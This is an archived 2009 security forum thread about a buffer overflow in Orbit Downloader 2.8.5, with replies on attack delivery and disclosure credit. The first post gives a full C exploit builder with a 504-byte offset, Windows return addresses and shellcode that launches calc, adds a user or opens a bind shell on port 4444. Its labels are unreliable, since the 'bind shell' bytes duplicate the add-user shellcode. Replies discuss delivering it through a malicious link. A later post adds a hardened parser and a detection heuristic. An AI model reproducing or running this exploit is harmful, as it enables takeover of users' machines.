Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)

All times are UTC [ DST ]

 Post subject: 0day Orbit dw
PostPosted: 03 Feb 2009 01:53 

Joined: 03 Feb 2009 01:40
Posts: 31
Hello, I'm Florin. I study at the Computer Science University in Bucharest and my interests are programming (ONLY C and asm), disassembly, specializing in Unix systems, low-level analysis, algorithms etc. Strictly software oriented, no hardware.
I would appreciate it if someone could give some help or ideas on how to execute code remotely in this particular case.
Love the work on this website, keep it goin' Aluigi :P, I'm a big fan.
Download a demo video from here:
http://rapidshare.com/files/188952557/o ... t.avi.html

Code:
/*0day orbit_expl.c*/
/*Orbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit*/
/*Bug found by fl0 fl0w ,exploit programmed by fl0 fl0w*/

/*Click NEW and copy-paste each line into the URL field.
  Important: copy-paste one line at a time because it won't allow you to paste more than 100 characters at
  once, so be patient.
***************************SPRAY THE STACK*****************************************************************
*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     *
*CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC     *
*BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB     *
*DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD     *
*FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF     *
*LVVBXUUXXGGGMMMMGGTGGJJJJJJGYGGEEEEEEGRGGGGGGGGGOGGGGGGGGGLGGGGGGGGGZGGGGGGGGGAGGGGGGGGGSGGGGGGGGGCC     *
*        10        20         30        40        50        60        70        80        90        100   *
*TTTTXAAXTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT     *
*   |EIP| = 504 bytes offset                                                                              *
*                                                                                                         *
*URL STRUCTURE                                                                                          *
* http://www. + [604 * NOP(0X90)] + [NEW EIP(JMP ESP)] +[SHELLCODE] + [0X00(1 * NULL BYTE)]               *
***********************************************************************************************************
EAX 00000001
ECX 46464646 ->overwritten
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 00BD3AD0
ESP 0140F574 ASCII "XGGGMMMMGGTGGJJJJJJGYGGEEEEEEGRGGGGGGGGGOGGGGGGGGGLGGGGGGGGGZGGGGGGGGGAGGGGGGGGGSGGGGGGGGGCC:80"
EBP 00BD3AF0
ESI 00BD4020
EDI 00CC4360 download.00CC4360
EIP 58555558 ->overwritten

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define SIZE 10000
#define OFFSET 504

void file (char * , char *);
void write (char *, int ,char *);
void print ();
void usage (char *);
void target ();
/* thanks Metasploit for the shellcodes */
// LAUNCH CALC.EXE
char shellcode_1[] =
                                               "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
                                               "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
                                               "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
                                               "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
                                               "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
                                               "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
                                               "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
                                               "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
                                               "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
                                               "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
                                               "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
                                               "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
                                               "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
                                               "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
                                               "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
                                               "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
                                               "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
                                               "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
                                               "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
                                               "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
                                               "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
                                                                                                                                            "\x70\x63";

// ADD USER
char shellcode_2[] =
                                                                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                                                                    "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

// REVERSE CMD SHELL -> BIND PORT (note: as posted, these bytes are identical to shellcode_2 above)
char shellcode_3[] =
                                                  "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                  "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                  "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                  "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                  "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                  "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                  "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                  "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                  "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                  "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                  "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                  "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                  "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                  "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                  "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                  "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                  "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                  "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                  "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                  "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                  "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                                                  "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
struct {
    char *OS;
    unsigned int EIP;
} Retcodes[] = {
    { "Microsoft Windows Pro sp3 English:", 0x7C8369F0 },        /* call esp */
    { "Microsoft Windows Pro sp3 English:", 0x7C86467B },        /* jmp esp */
    { "\t\t\t  UNIVERSAL_1:", 0x1008E153 },
    { "\t\t\t  UNIVERSAL_2:", 0x219FB9B },
    { "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /* jmp esp */
    { "sss", 0x7C868667 },
}, t;

int main(int argc, char *argv[])
{
    int shell;
    char *Z;
    char *actbuff;

    actbuff = (char *)malloc(SIZE);
    if (argc < 4) {                     /* target, shell_type and filename are all required */
        system("cls");
        printf("***********************************************************************\n");
        print();
        usage(argv[0]);
        Sleep(1000);
        printf("\n\n");
        printf("\t\t\t\tTargets\n");
        target();
        printf("************************************************************************\n");
        exit(0);
    }

    Z = argv[1];                        /* index into Retcodes[] */
    shell = atoi(argv[2]);              /* 1, 2 or 3, see usage() */
    write(actbuff, shell, Z);
    file(argv[3], actbuff);
    print();
    printf("Loading ...");
    Sleep(3000);
    printf("File built successfully\n");

    return 0;
}
void target()
{
    int i;
    for (i = 0; i < sizeof(Retcodes)/sizeof(t); i++)
        printf("> %d %s <0x%.8x> \n", i, Retcodes[i].OS, Retcodes[i].EIP);
}
void file(char *filename, char *buff)
{
    FILE *f;

    if ((f = fopen(filename, "wb")) == NULL) {
        printf("Error writing file\n");
        exit(0);
    }
    fwrite(buff, 1, strlen(buff), f);
    free(buff);
    fclose(f);
}
     
void write(char *buffer, int shellc_type, char *Y)
{
    unsigned int offset = 0;
    int idx = atoi(Y);
    unsigned int RET;

    /* the original had no bounds check on the target index */
    if (idx < 0 || idx >= (int)(sizeof(Retcodes)/sizeof(t))) {
        printf("Unknown target %d\n", idx);
        exit(0);
    }
    RET = Retcodes[idx].EIP;
    memset(buffer, 0x90, SIZE);
    offset = OFFSET;
    memcpy(buffer + offset, &RET, 4); offset += 4;
    switch (shellc_type) {
        case 1:
            memcpy(buffer + offset, shellcode_1, strlen(shellcode_1)); offset += strlen(shellcode_1);
            memset(buffer + offset, 0x00, 1);
            break;
        case 2:
            memcpy(buffer + offset, shellcode_2, strlen(shellcode_2)); offset += strlen(shellcode_2);
            memset(buffer + offset, 0x00, 1);
            break;
        case 3:
            memcpy(buffer + offset, shellcode_3, strlen(shellcode_3)); offset += strlen(shellcode_3);
            memset(buffer + offset, 0x00, 1);
            break;
        default:
            /* without a terminator file() would read past the buffer */
            printf("Unknown shell_type %d\n", shellc_type);
            exit(0);
    }
}
void usage(char *K)
{
    printf("Usage is: %s [target] [shell_type] [filename].txt\n", K);
    fputs(
        "\t\tRetaddress for your version of Windows\n"
        "\t\tShell_type is the type of shellcode you want to run\n"
        "\t\t\t *Press 1 To Run CALC.EXE\n"
        "\t\t\t *Press 2 To Add User\n"
        "\t\t\t *Press 3 To Bind Shell to Port 4444\n"
        "\t\tExample\n"
        "\t\t\torbit_expl.exe 0 3 file.txt\n"
    , stdout);
}
void print()
{
    fputs(
        "\t\tOrbit Downloader V2.8.5 Malformed URL Buffer Overflow Exploit\n"
        "\t\tby fl0 fl0w\n"
        "\t\tContact: flo_flow_supremacy@yahoo.com\n"
        "\n", stdout);
}
 
 
 Post subject: Re: 0day Orbit dw
PostPosted: 03 Feb 2009 04:21 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
From the video it is clear that code execution is possible, so I think you are referring to the attack scenario, right?
In that case the best solution seems to be the classical "link" in an HTML page like the one I have attached to the post.

In Internet Explorer the exploitation is automatic when the link is clicked, and I bet this operation can even be automated with JavaScript (no luck using http-equiv=Refresh).

In Firefox instead this is not possible because Orbit doesn't monitor the URLs like in IE (this is what it seems here), so "Download by Orbit (X)" must be manually selected by the user.

Also, Orbit isn't assigned to a specific URL handler and has no extensions registered (.olt, .ob! and .metalink are not assigned), so I don't see other scenarios.


Attachments:
orbit_test.zip [197 Bytes]
 
 Post subject: Re: 0day Orbit dw
PostPosted: 03 Feb 2009 15:39 

Joined: 03 Feb 2009 01:40
Posts: 31
I've considered a JavaScript page.... I couldn't make it run; if you open the orbit_test page Orbit launches but nothing happens, it just crashes (mm, I might know why).
There is some other thing that happens: if you write [http://www.] and copy-paste the long string it works, but if I copy-paste the entire line, meaning http://www.long string, it doesn't work anymore.


 
 Post subject: Re: 0day Orbit dw
PostPosted: 03 Feb 2009 18:17 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
A crash? It's just the buffer overflow you found, with EIP 0x61616161.
The only problem I see is with the chars greater than 0x7f; you need to find a 100% alphanumeric return address and shellcode.

In the meantime I'll check if I can find a solution to both the EIP and the shellcode.


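An added example, not code from this thread or from Orbit Downloader: it shows the bug class behind the first post (URL text copied into a fixed-size stack buffer until it runs over the saved return address) as a vulnerable parser beside a hardened one, adds the printable-7-bit byte check that corresponds to the constraint on characters above 0x7f noted in the reply above, and includes a log-side run-length heuristic for spotting this kind of input. HOST_MAX, every function name, and the "http://www." plus 'A'-filler sample are assumptions constructed for the illustration, not values from the product.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the illustration; not Orbit's real limit. */
#define HOST_MAX 256

/* Shape of the bug class discussed in the thread: a fixed-size stack buffer
 * filled by an unbounded copy of attacker-controlled URL text. Anything past
 * HOST_MAX bytes runs into the saved return address. Kept only for contrast
 * and never called with oversized input in this file. */
void host_from_url_unsafe(const char *url, char *out)
{
    char host[HOST_MAX];
    const char *p = url;

    if (strncmp(p, "http://", 7) == 0)
        p += 7;
    strcpy(host, p);                      /* no length check: overflow */
    host[strcspn(host, ":/")] = '\0';     /* cut at port or path */
    strcpy(out, host);
}

/* Hardened version: bounded by the caller's buffer, over-long or empty hosts
 * are rejected, and only printable 7-bit ASCII is accepted. Returns 0 on
 * success and -1 on rejection; on rejection *out is untouched. */
int host_from_url_safe(const char *url, char *out, size_t out_len)
{
    const char *p = url;
    const unsigned char *q;
    size_t n;

    if (url == NULL || out == NULL || out_len == 0)
        return -1;
    if (strncmp(p, "http://", 7) == 0)
        p += 7;
    for (q = (const unsigned char *)p; *q != '\0'; q++)
        if (*q < 0x20 || *q > 0x7e)
            return -1;                    /* control byte or 8-bit byte */
    n = strcspn(p, ":/");                 /* host ends at port or path */
    if (n == 0 || n >= out_len)
        return -1;                        /* empty, or would not fit */
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Log-side heuristic: longest run of one repeated byte in a URL. The probes
 * quoted in the thread are runs of hundreds of identical bytes; a genuine
 * hostname never comes close, so a high value is worth alerting on. */
size_t longest_byte_run(const char *s)
{
    size_t best = 0, cur = 0, i;

    for (i = 0; s[i] != '\0'; i++) {
        cur = (i > 0 && s[i] == s[i - 1]) ? cur + 1 : 1;
        if (cur > best)
            best = cur;
    }
    return best;
}

/* Constructed sample: "http://www." followed by `filler` 'A' bytes, the
 * shape from the first post. Returns a malloc'd string; caller frees. */
char *make_probe(size_t filler)
{
    const char prefix[] = "http://www.";
    size_t plen = sizeof prefix - 1;
    char *buf = malloc(plen + filler + 1);

    if (buf == NULL)
        return NULL;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'A', filler);
    buf[plen + filler] = '\0';
    return buf;
}

/* Small result helpers so outcomes can be checked without printing. */
int url_accepted(const char *url)
{
    char host[HOST_MAX];
    return host_from_url_safe(url, host, sizeof host) == 0;
}

int host_equals(const char *url, const char *expected)
{
    char host[HOST_MAX];
    return host_from_url_safe(url, host, sizeof host) == 0 && strcmp(host, expected) == 0;
}

int probe_rejected(size_t filler)
{
    char host[HOST_MAX];
    char *probe = make_probe(filler);
    int rc;

    if (probe == NULL)
        return -1;
    rc = host_from_url_safe(probe, host, sizeof host);
    free(probe);
    return rc == -1;
}

int main(void)
{
    char host[HOST_MAX];

    host_from_url_unsafe("http://www.example.com:80/x", host);   /* short input only */
    printf("unsafe parser, short URL: %s\n", host);
    printf("safe parser keeps www.example.com: %d\n", host_equals("http://www.example.com:80/path", "www.example.com"));
    printf("safe parser rejects 604-byte filler: %d\n", probe_rejected(604));
    printf("safe parser rejects 8-bit bytes: %d\n", !url_accepted("http://www.\x90\x90.com/"));
    return 0;
}
```

The byte-class check and the length check are independent: the hardened parser rejects the long filler because it does not fit, and rejects a short URL carrying 0x90 bytes because of the byte class, so fixing only one of the two would still leave the other path open.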
 
 Post subject: Re: 0day Orbit dw
PostPosted: 25 Feb 2009 16:56 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Uhmmm, today Secunia has released an advisory about a bug which looks exactly like the one you found almost one month ago:

http://secunia.com/advisories/33843

I sent them a feedback web form about 3 hours ago about this matter, but no reply yet.

Just now I have also noticed that you released a video on YouTube about this problem 2 weeks ago (showing that wrong way to test the bug), but obviously YouTube is not a known security mailing list/website, so it's logical that nobody has seen and indexed this vulnerability before.

*EDIT*: after an additional search I have seen that you also reported the bug on Packetstorm, which IS a security website, and on other websites too, so it's too "strange" that it has not been seen.


 
 Post subject: Re: 0day Orbit dw
PostPosted: 26 Feb 2009 13:43 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
...or maybe they saw it and just copied it :)


 
 Post subject: Re: 0day Orbit dw
PostPosted: 26 Feb 2009 15:19 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
No, definitely not that.

Anyway, after over one day since the feedback I sent them without having received a reply, the only thing I can think of is that they intentionally ignored the public report made by flo flow... anyway this is not my problem, I simply wanted to point out this strange fact because I was aware of this bug.


 
 Post subject: Re: 0day Orbit dw
PostPosted: 26 Feb 2009 23:51 

Joined: 03 Feb 2009 01:40
Posts: 31
Well, what can you do, I don't care too much about Secunia, or others; I would have been offended if Microsoft had done it :p.
I've been busy with school and only just now saw the replies.
I'll share other stuff with you guys as well to prove my talent.. :). Thanks aluigi for the initiative.

